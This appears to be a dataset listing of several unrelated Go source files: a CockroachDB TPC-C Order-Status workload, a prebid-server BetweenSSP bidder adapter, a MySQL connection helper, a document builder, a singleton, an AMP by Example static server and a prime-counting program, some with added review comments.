// Use of this software is governed by the Business Source License
// included in the file licenses/BSL.txt.
//
// As of the Change Date specified in that file, in accordance with
// the Business Source License, use of this software will be governed
// by the Apache License, Version 2.0, included in the file
// licenses/APL.txt.
package tpcc
import (
"context"
"sync/atomic"
"time"
"github.com/cockroachdb/cockroach-go/crdb"
"github.com/cockroachdb/cockroach/pkg/util/bufalloc"
"github.com/cockroachdb/cockroach/pkg/util/timeutil"
"github.com/cockroachdb/cockroach/pkg/workload"
"github.com/cockroachdb/errors"
"github.com/jackc/pgx/pgtype"
"golang.org/x/exp/rand"
)
// From the TPCC spec, section 2.6:
//
// The Order-Status business transaction queries the status of a customer's last
// order. It represents a mid-weight read-only database transaction with a low
// frequency of execution and response time requirement to satisfy on-line
// users. In addition, this table includes non-primary key access to the
// CUSTOMER table.
// orderStatusData carries the values produced by one Order-Status
// transaction; it is the run() result returned to the workload driver.
type orderStatusData struct {
	// Return data specified by 2.6.3.3
	dID        int         // district id
	cID        int         // customer id (selected or resolved from last name)
	cFirst     string      // customer first name
	cMiddle    string      // customer middle name
	cLast      string      // customer last name
	cBalance   float64     // customer balance
	oID        int         // most recent order id for the customer
	oEntryD    time.Time   // order entry date
	oCarrierID pgtype.Int8 // carrier id (nullable in the schema)

	items []orderItem // order lines of the selected order
}
// customerData is one row of the select-by-last-name result set, kept
// so the middle row (per spec 2.6.2.2) can be picked after scanning.
type customerData struct {
	cID      int
	cBalance float64
	cFirst   string
	cMiddle  string
}
// orderStatus implements the TPC-C Order-Status transaction (spec §2.6).
type orderStatus struct {
	config *tpcc
	mcp    *workload.MultiConnPool
	sr     workload.SQLRunner

	// Prepared statements, defined in createOrderStatus.
	selectByCustID   workload.StmtHandle
	selectByLastName workload.StmtHandle
	selectOrder      workload.StmtHandle
	selectItems      workload.StmtHandle

	a bufalloc.ByteAllocator // scratch allocator for generated names
}

// Compile-time assertion that orderStatus satisfies tpccTx.
var _ tpccTx = &orderStatus{}
// createOrderStatus builds the orderStatus transaction, defining its four
// prepared statements and initializing the SQL runner against mcp.
func createOrderStatus(
	ctx context.Context, config *tpcc, mcp *workload.MultiConnPool,
) (tpccTx, error) {
	o := &orderStatus{
		config: config,
		mcp:    mcp,
	}

	// Select by customer id.
	o.selectByCustID = o.sr.Define(`
		SELECT c_balance, c_first, c_middle, c_last
		FROM customer
		WHERE c_w_id = $1 AND c_d_id = $2 AND c_id = $3`,
	)

	// Pick the middle row, rounded up, from the selection by last name.
	o.selectByLastName = o.sr.Define(`
		SELECT c_id, c_balance, c_first, c_middle
		FROM customer
		WHERE c_w_id = $1 AND c_d_id = $2 AND c_last = $3
		ORDER BY c_first ASC`,
	)

	// Select the customer's order.
	o.selectOrder = o.sr.Define(`
		SELECT o_id, o_entry_d, o_carrier_id
		FROM "order"
		WHERE o_w_id = $1 AND o_d_id = $2 AND o_c_id = $3
		ORDER BY o_id DESC
		LIMIT 1`,
	)

	// Select the items from the customer's order.
	o.selectItems = o.sr.Define(`
		SELECT ol_i_id, ol_supply_w_id, ol_quantity, ol_amount, ol_delivery_d
		FROM order_line
		WHERE ol_w_id = $1 AND ol_d_id = $2 AND ol_o_id = $3`,
	)

	if err := o.sr.Init(ctx, "order-status", mcp, config.connFlags); err != nil {
		return nil, err
	}
	return o, nil
}
// run executes one Order-Status transaction against warehouse wID and
// returns the collected orderStatusData. Per spec 2.6.1.2, the customer
// is selected by last name 60% of the time and by id otherwise.
func (o *orderStatus) run(ctx context.Context, wID int) (interface{}, error) {
	atomic.AddUint64(&o.config.auditor.orderStatusTransactions, 1)

	rng := rand.New(rand.NewSource(uint64(timeutil.Now().UnixNano())))

	d := orderStatusData{
		dID: rng.Intn(10) + 1,
	}

	// 2.6.1.2: The customer is randomly selected 60% of the time by last name
	// and 40% by number.
	if rng.Intn(100) < 60 {
		d.cLast = string(o.config.randCLast(rng, &o.a))
		atomic.AddUint64(&o.config.auditor.orderStatusByLastName, 1)
	} else {
		d.cID = o.config.randCustomerID(rng)
	}

	tx, err := o.mcp.Get().BeginEx(ctx, o.config.txOpts)
	if err != nil {
		return nil, err
	}
	if err := crdb.ExecuteInTx(
		ctx, (*workload.PgxTx)(tx),
		func() error {
			// 2.6.2.2 explains this entire transaction.
			// Select the customer
			if d.cID != 0 {
				// Case 1: select by customer id
				if err := o.selectByCustID.QueryRowTx(
					ctx, tx, wID, d.dID, d.cID,
				).Scan(&d.cBalance, &d.cFirst, &d.cMiddle, &d.cLast); err != nil {
					// Fixed a typo in the wrap message: "customer idfail".
					return errors.Wrap(err, "select by customer id fail")
				}
			} else {
				// Case 2: Pick the middle row, rounded up, from the selection by last name.
				rows, err := o.selectByLastName.QueryTx(ctx, tx, wID, d.dID, d.cLast)
				if err != nil {
					return errors.Wrap(err, "select by last name fail")
				}
				customers := make([]customerData, 0, 1)
				for rows.Next() {
					c := customerData{}
					err = rows.Scan(&c.cID, &c.cBalance, &c.cFirst, &c.cMiddle)
					if err != nil {
						rows.Close()
						return err
					}
					customers = append(customers, c)
				}
				if err := rows.Err(); err != nil {
					return err
				}
				rows.Close()
				if len(customers) == 0 {
					return errors.New("found no customers matching query orderStatus.selectByLastName")
				}
				// Middle row, rounded up (0-indexed).
				cIdx := (len(customers) - 1) / 2
				c := customers[cIdx]
				d.cID = c.cID
				d.cBalance = c.cBalance
				d.cFirst = c.cFirst
				d.cMiddle = c.cMiddle
			}

			// Select the customer's order.
			if err := o.selectOrder.QueryRowTx(
				ctx, tx, wID, d.dID, d.cID,
			).Scan(&d.oID, &d.oEntryD, &d.oCarrierID); err != nil {
				return errors.Wrap(err, "select order fail")
			}

			// Select the items from the customer's order.
			rows, err := o.selectItems.QueryTx(ctx, tx, wID, d.dID, d.oID)
			if err != nil {
				return errors.Wrap(err, "select items fail")
			}
			defer rows.Close()

			// On average there's 10 items per order - 2.4.1.3
			d.items = make([]orderItem, 0, 10)
			for rows.Next() {
				item := orderItem{}
				if err := rows.Scan(&item.olIID, &item.olSupplyWID, &item.olQuantity, &item.olAmount, &item.olDeliveryD); err != nil {
					return err
				}
				d.items = append(d.items, item)
			}
			return rows.Err()
		}); err != nil {
		return nil, err
	}
	return d, nil
}
|
package between
import (
"encoding/json"
"fmt"
"net/http"
"net/url"
"strconv"
"text/template"
"github.com/prebid/openrtb/v19/openrtb2"
"github.com/prebid/prebid-server/adapters"
"github.com/prebid/prebid-server/config"
"github.com/prebid/prebid-server/errortypes"
"github.com/prebid/prebid-server/macros"
"github.com/prebid/prebid-server/openrtb_ext"
)
// BetweenAdapter is the prebid-server bidder adapter for BetweenSSP.
type BetweenAdapter struct {
	// EndpointTemplate expands {{.Host}}/{{.PublisherID}}-style macros
	// from the bidder config's endpoint URL (see Builder).
	EndpointTemplate *template.Template
}
// MakeRequests validates and preprocesses the bid request, resolves the
// BetweenSSP endpoint from the imp ext, and returns a single POST
// request carrying the JSON-encoded bid request with device/site
// headers attached.
func (a *BetweenAdapter) MakeRequests(request *openrtb2.BidRequest, reqInfo *adapters.ExtraRequestInfo) ([]*adapters.RequestData, []error) {
	var errors []error
	if len(request.Imp) == 0 {
		return nil, []error{&errortypes.BadInput{
			// was fmt.Sprintf with no format arguments (go vet / S1039)
			Message: "No valid Imps in Bid Request",
		}}
	}
	ext, errors := preprocess(request)
	// len(nil) == 0, so the former `errors != nil &&` guard was redundant.
	if len(errors) > 0 {
		return nil, errors
	}
	endpoint, err := a.buildEndpointURL(ext)
	if err != nil {
		return nil, []error{&errortypes.BadInput{
			Message: fmt.Sprintf("Failed to build endpoint URL: %s", err),
		}}
	}
	data, err := json.Marshal(request)
	if err != nil {
		return nil, []error{&errortypes.BadInput{
			// was fmt.Sprintf with no format arguments (go vet / S1039)
			Message: "Error in packaging request to JSON",
		}}
	}
	headers := http.Header{}
	headers.Add("Content-Type", "application/json;charset=utf-8")
	headers.Add("Accept", "application/json")
	if request.Device != nil {
		addHeaderIfNonEmpty(headers, "User-Agent", request.Device.UA)
		addHeaderIfNonEmpty(headers, "X-Forwarded-For", request.Device.IP)
		addHeaderIfNonEmpty(headers, "Accept-Language", request.Device.Language)
		if request.Device.DNT != nil {
			addHeaderIfNonEmpty(headers, "DNT", strconv.Itoa(int(*request.Device.DNT)))
		}
	}
	if request.Site != nil {
		addHeaderIfNonEmpty(headers, "Referer", request.Site.Page)
	}
	return []*adapters.RequestData{{
		Method:  "POST",
		Uri:     endpoint,
		Body:    data,
		Headers: headers,
	}}, errors
}
// unpackImpExt decodes the two-layer imp.ext (bidder wrapper, then the
// Between-specific ext) and returns a BadInput error when either layer
// fails to parse.
func unpackImpExt(imp *openrtb2.Imp) (*openrtb_ext.ExtImpBetween, error) {
	var bidderExt adapters.ExtImpBidder
	if err := json.Unmarshal(imp.Ext, &bidderExt); err != nil {
		return nil, &errortypes.BadInput{
			Message: fmt.Sprintf("ignoring imp id=%s, invalid BidderExt", imp.ID),
		}
	}
	betweenExt := new(openrtb_ext.ExtImpBetween)
	if err := json.Unmarshal(bidderExt.Bidder, betweenExt); err != nil {
		return nil, &errortypes.BadInput{
			Message: fmt.Sprintf("ignoring imp id=%s, invalid ImpExt", imp.ID),
		}
	}
	return betweenExt, nil
}
// buildEndpointURL expands the adapter's endpoint template with the
// host and publisher id from the imp ext; both fields are required.
func (a *BetweenAdapter) buildEndpointURL(e *openrtb_ext.ExtImpBetween) (string, error) {
	const missingRequiredParameterMessage = "required BetweenSSP parameter \"%s\" is missing"
	if e.Host == "" {
		return "", &errortypes.BadInput{
			Message: fmt.Sprintf(missingRequiredParameterMessage, "host"),
		}
	}
	if e.PublisherID == "" {
		return "", &errortypes.BadInput{
			Message: fmt.Sprintf(missingRequiredParameterMessage, "publisher_id"),
		}
	}
	params := macros.EndpointTemplateParams{Host: e.Host, PublisherID: e.PublisherID}
	return macros.ResolveMacros(a.EndpointTemplate, params)
}
// buildImpBanner ensures the imp's Banner carries an explicit W/H: when
// both are unset it pops the first Format entry and promotes its size,
// replacing imp.Banner with a modified copy. Non-banner imps and imps
// with no sizes at all are rejected as BadInput.
func buildImpBanner(imp *openrtb2.Imp) error {
	if imp.Banner == nil {
		return &errortypes.BadInput{
			// was fmt.Sprintf with no format arguments (go vet / S1039)
			Message: "Request needs to include a Banner object",
		}
	}
	banner := *imp.Banner
	if banner.W == nil && banner.H == nil {
		if len(banner.Format) == 0 {
			return &errortypes.BadInput{
				// was fmt.Sprintf with no format arguments (go vet / S1039)
				Message: "Need at least one size to build request",
			}
		}
		format := banner.Format[0]
		banner.Format = banner.Format[1:]
		banner.W = &format.W
		banner.H = &format.H
		imp.Banner = &banner
	}
	return nil
}
// Add Between required properties to Imp object.
// Currently only Secure is set; the betweenExt parameter is accepted
// but not read here.
func addImpProps(imp *openrtb2.Imp, secure *int8, betweenExt *openrtb_ext.ExtImpBetween) {
	imp.Secure = secure
}
// addHeaderIfNonEmpty adds headerName: headerValue to headers, skipping
// empty values so no blank header fields are emitted.
func addHeaderIfNonEmpty(headers http.Header, headerName string, headerValue string) {
	if headerValue == "" {
		return
	}
	headers.Add(headerName, headerValue)
}
// Handle request errors and formatting to be sent to Between.
// preprocess rewrites request.Imp in place: it decodes each imp's
// Between ext, marks the imp secure when the site page is https, and
// normalizes the banner size; imps that fail are dropped and their
// errors collected. It returns the ext of the last successfully parsed
// imp alongside any per-imp errors.
func preprocess(request *openrtb2.BidRequest) (*openrtb_ext.ExtImpBetween, []error) {
	errors := make([]error, 0, len(request.Imp))
	resImps := make([]openrtb2.Imp, 0, len(request.Imp))
	// secure is 1 iff the site page URL parses and uses https.
	secure := int8(0)
	if request.Site != nil && request.Site.Page != "" {
		pageURL, err := url.Parse(request.Site.Page)
		if err == nil && pageURL.Scheme == "https" {
			secure = int8(1)
		}
	}
	var betweenExt *openrtb_ext.ExtImpBetween
	for _, imp := range request.Imp {
		var err error
		betweenExt, err = unpackImpExt(&imp)
		if err != nil {
			errors = append(errors, err)
			continue
		}
		// NOTE(review): every kept imp shares a pointer to the same
		// local `secure` variable — confirm downstream never mutates
		// one imp's Secure expecting the others to be independent.
		addImpProps(&imp, &secure, betweenExt)
		if err := buildImpBanner(&imp); err != nil {
			errors = append(errors, err)
			continue
		}
		resImps = append(resImps, imp)
	}
	request.Imp = resImps
	return betweenExt, errors
}
// MakeBids parses the BetweenSSP response: 204 means no bid, any other
// non-200 status is an error, and every bid in every seat is returned
// as a banner bid.
func (a *BetweenAdapter) MakeBids(internalRequest *openrtb2.BidRequest, externalRequest *adapters.RequestData, response *adapters.ResponseData) (*adapters.BidderResponse, []error) {
	switch {
	case response.StatusCode == http.StatusNoContent:
		// no bid response
		return nil, nil
	case response.StatusCode != http.StatusOK:
		return nil, []error{&errortypes.BadServerResponse{
			Message: fmt.Sprintf("Invalid Status Returned: %d. Run with request.debug = 1 for more info", response.StatusCode),
		}}
	}
	var parsed openrtb2.BidResponse
	if err := json.Unmarshal(response.Body, &parsed); err != nil {
		return nil, []error{&errortypes.BadServerResponse{
			Message: fmt.Sprintf("Unable to unpackage bid response. Error %s", err.Error()),
		}}
	}
	out := adapters.NewBidderResponseWithBidsCapacity(1)
	for _, seatBid := range parsed.SeatBid {
		for i := range seatBid.Bid {
			out.Bids = append(out.Bids, &adapters.TypedBid{
				Bid:     &seatBid.Bid[i],
				BidType: openrtb_ext.BidTypeBanner,
			})
		}
	}
	return out, nil
}
// Builder builds a new instance of the Between adapter for the given
// bidder with the given config, parsing config.Endpoint as the macro
// endpoint template.
func Builder(bidderName openrtb_ext.BidderName, config config.Adapter, server config.Server) (adapters.Bidder, error) {
	// Renamed the local from "template" to "tmpl": the original shadowed
	// the imported text/template package name inside this function.
	tmpl, err := template.New("endpointTemplate").Parse(config.Endpoint)
	if err != nil {
		return nil, fmt.Errorf("unable to parse endpoint url template: %v", err)
	}
	bidder := BetweenAdapter{
		EndpointTemplate: tmpl,
	}
	return &bidder, nil
}
|
package main
import (
"log"
"os"
"github.com/jmoiron/sqlx"
)
// dbInit reads the OGRE_DB_* environment variables and returns a
// connected database handle (dbConnect exits the process on failure).
func dbInit() *sqlx.DB {
	return dbConnect(
		os.Getenv("OGRE_DB_USERNAME"),
		os.Getenv("OGRE_DB_PASSWORD"),
		os.Getenv("OGRE_DB_HOSTNAME"),
		os.Getenv("OGRE_DB_NAME"),
	)
}
// dbConnect opens a MySQL connection via sqlx, exiting the process
// (log.Fatalln) on failure so callers always receive a usable handle.
//
// NOTE(review): the DSN is "user:pass@host/db" with no network
// specifier; go-sql-driver/mysql expects "user:pass@tcp(host)/db" for a
// TCP host — confirm which driver registers "mysql" here and that this
// DSN actually parses. Also verify the driver is blank-imported
// somewhere, since it isn't in this file's visible imports.
func dbConnect(username string, password string, host string, dbname string) *sqlx.DB {
	db, err := sqlx.Connect("mysql", username+":"+password+"@"+host+"/"+dbname)
	if err != nil {
		log.Fatalln(err)
	}
	return db
}
|
package document
import "time"
// NewBuilder returns an empty DocumentBuilder whose fields are set
// fluently via the With* methods before calling Build.
func NewBuilder() DocumentBuilder {
	return &documentBuilder{}
}
// document is the unexported concrete implementation of Document.
type document struct {
	id           int64
	uuid         string
	name         string
	content      string
	created      time.Time
	lastModified time.Time
}

// Document is a read-only view of a document: identity, content, and
// creation/modification timestamps.
type Document interface {
	Id() int64
	Uuid() string
	Name() string
	Content() string
	Created() time.Time
	LastModified() time.Time
}
// Id returns the document's numeric identifier.
func (d *document) Id() int64 {
	return d.id
}

// Uuid returns the document's UUID string.
func (d *document) Uuid() string {
	return d.uuid
}

// Name returns the document's name.
func (d *document) Name() string {
	return d.name
}

// Content returns the document's content.
func (d *document) Content() string {
	return d.content
}

// Created returns the creation timestamp.
func (d *document) Created() time.Time {
	return d.created
}

// LastModified returns the last-modification timestamp.
func (d *document) LastModified() time.Time {
	return d.lastModified
}
// documentBuilder accumulates field values and is the unexported
// concrete implementation of DocumentBuilder.
type documentBuilder struct {
	id           int64
	uuid         string
	name         string
	content      string
	created      time.Time
	lastModified time.Time
}

// DocumentBuilder is a fluent builder for Document values; each With*
// call returns the builder so calls can be chained, ending with Build.
type DocumentBuilder interface {
	WithId(int64) DocumentBuilder
	WithUuid(string) DocumentBuilder
	WithName(string) DocumentBuilder
	WithContent(string) DocumentBuilder
	WithCreated(time.Time) DocumentBuilder
	WithLastModified(time.Time) DocumentBuilder
	Build() Document
}
// WithId sets the document id and returns the builder for chaining.
func (b *documentBuilder) WithId(id int64) DocumentBuilder {
	b.id = id
	return b
}

// WithUuid sets the document UUID and returns the builder for chaining.
func (b *documentBuilder) WithUuid(uuid string) DocumentBuilder {
	b.uuid = uuid
	return b
}

// WithName sets the document name and returns the builder for chaining.
func (b *documentBuilder) WithName(name string) DocumentBuilder {
	b.name = name
	return b
}

// WithContent sets the document content and returns the builder for chaining.
func (b *documentBuilder) WithContent(content string) DocumentBuilder {
	b.content = content
	return b
}

// WithCreated sets the creation timestamp and returns the builder for chaining.
func (b *documentBuilder) WithCreated(created time.Time) DocumentBuilder {
	b.created = created
	return b
}

// WithLastModified sets the last-modification timestamp and returns the
// builder for chaining.
func (b *documentBuilder) WithLastModified(lastModified time.Time) DocumentBuilder {
	b.lastModified = lastModified
	return b
}
func (b *documentBuilder) Build() Document {
return &document{
id: b.id,
uuid: b.uuid,
name: b.name,
content: b.content,
created: b.created,
lastModified: b.lastModified,
}
}
|
package emperor2
import (
"fmt"
"sync"
)
// emperor is the singleton type; it is unexported so callers can only
// obtain an instance through GetInstance.
type emperor struct {
	Name string
}

// Say prints the emperor's name to stdout.
func (e emperor) Say() {
	fmt.Printf("my name: %s\n", e.Name)
}

var (
	singleton *emperor
	// once guards the one-time initialization of singleton.
	once sync.Once
)

// GetInstance lazily creates and returns the process-wide emperor instance.
//
// Bug fixed: the original used double-checked locking, which is a data
// race under the Go memory model — the first `singleton == nil` check was
// an unsynchronized read racing with the write inside the lock. sync.Once
// provides the same lazy one-time initialization with a proper
// happens-before guarantee.
func GetInstance() *emperor {
	once.Do(func() {
		singleton = &emperor{}
	})
	return singleton
}
|
// Copyright Google Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package main
import (
"backend"
"net/http"
"os"
"playground"
"strings"
)
// Site-wide constants for the static-file server.
const (
	// MAX_AGE_IN_SECONDS is three minutes; presumably the default
	// Cache-Control max-age applied by backend.SetDefaultMaxAge — confirm.
	MAX_AGE_IN_SECONDS = 180 // three minutes
	// OLD_ADDRESS is the legacy appspot host; ServeStaticFiles redirects
	// requests addressed to it to the secure canonical version.
	OLD_ADDRESS = "amp-by-example.appspot.com"
	// DIST_DIR is the directory the built static site is served from.
	DIST_DIR = "dist"
)
// init registers the HTTP handlers for every sample backend and the
// playground, then installs the root handler chain: redirect/CORS policy
// (ServeStaticFiles) wrapping 404 handling (HandleNotFound) wrapping a
// static file server rooted at DIST_DIR.
// NOTE(review): init-based registration has implicit ordering; the call
// order below is preserved verbatim — individual Init calls are assumed
// independent, confirm before reordering.
func init() {
	backend.InitRedirects()
	backend.InitAmpLiveList()
	backend.InitAmpForm()
	backend.InitAmpCache()
	backend.InitProductBrowse()
	backend.InitHousingForm()
	backend.InitAmpAnalytics()
	backend.InitCommentSection()
	backend.InitHotelSample()
	backend.InitSlowResponseSample()
	backend.InitPollSample()
	backend.InitRatingSample()
	backend.InitAutosuggestSample()
	backend.InitPagedListSample()
	backend.InitAmpAccess()
	backend.InitFavoriteSample()
	backend.InitCheckout()
	backend.InitAmpConsent()
	backend.InitAmpStoryAutoAds()
	backend.InitLetsEncrypt()
	playground.InitPlayground()
	http.Handle("/", ServeStaticFiles(HandleNotFound(http.FileServer(http.Dir(DIST_DIR)))))
}
// HandleNotFound wraps h, replying 404 for directory-style requests
// (trailing slash) whose corresponding index.html is missing under
// DIST_DIR; all other requests pass straight through to h.
func HandleNotFound(h http.Handler) http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		isDirRequest := strings.HasSuffix(r.URL.Path, "/")
		if isDirRequest && !exists(DIST_DIR+r.URL.Path+"index.html") {
			http.NotFound(w, r)
			return
		}
		h.ServeHTTP(w, r)
	}
}
// ServeStaticFiles wraps h with the site-wide request policy: requests for
// the legacy host or over an insecure transport are redirected to the
// canonical HTTPS address; everything else gets CORS headers and the
// default max-age applied before h serves the response.
func ServeStaticFiles(h http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		mustRedirect := r.Host == OLD_ADDRESS || backend.IsInsecureRequest(r)
		if mustRedirect {
			backend.RedirectToSecureVersion(w, r)
			return
		}
		backend.EnableCors(w, r)
		backend.SetDefaultMaxAge(w)
		h.ServeHTTP(w, r)
	})
}
// exists reports whether path can be stat'ed. Note: any Stat error —
// including permission errors, not only os.ErrNotExist — is treated as
// "does not exist", matching the original behavior.
func exists(path string) bool {
	_, err := os.Stat(path)
	return err == nil
}
|
// Count how many primes lie between 101 and 200, and print every prime found.
package main
import (
"fmt"
"math"
)
// main counts the primes in [101, 200], printing each prime as it is
// found and then the total count.
//
// Bug fixed: the file comment promises to output all primes, but the
// original only printed the count (computed indirectly as 100 minus the
// number of composites) and never printed a single prime — the print
// statement was commented out and would have printed composites anyway.
func main() {
	count := 0 // number of primes found so far
	for i := 101; i <= 200; i++ {
		if isPrime(i) {
			fmt.Println(i)
			count++
		}
	}
	fmt.Println(count)
}

// isPrime reports whether n is prime by trial division up to sqrt(n).
func isPrime(n int) bool {
	if n < 2 {
		return false
	}
	limit := int(math.Sqrt(float64(n)))
	for j := 2; j <= limit; j++ {
		if n%j == 0 {
			return false
		}
	}
	return true
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.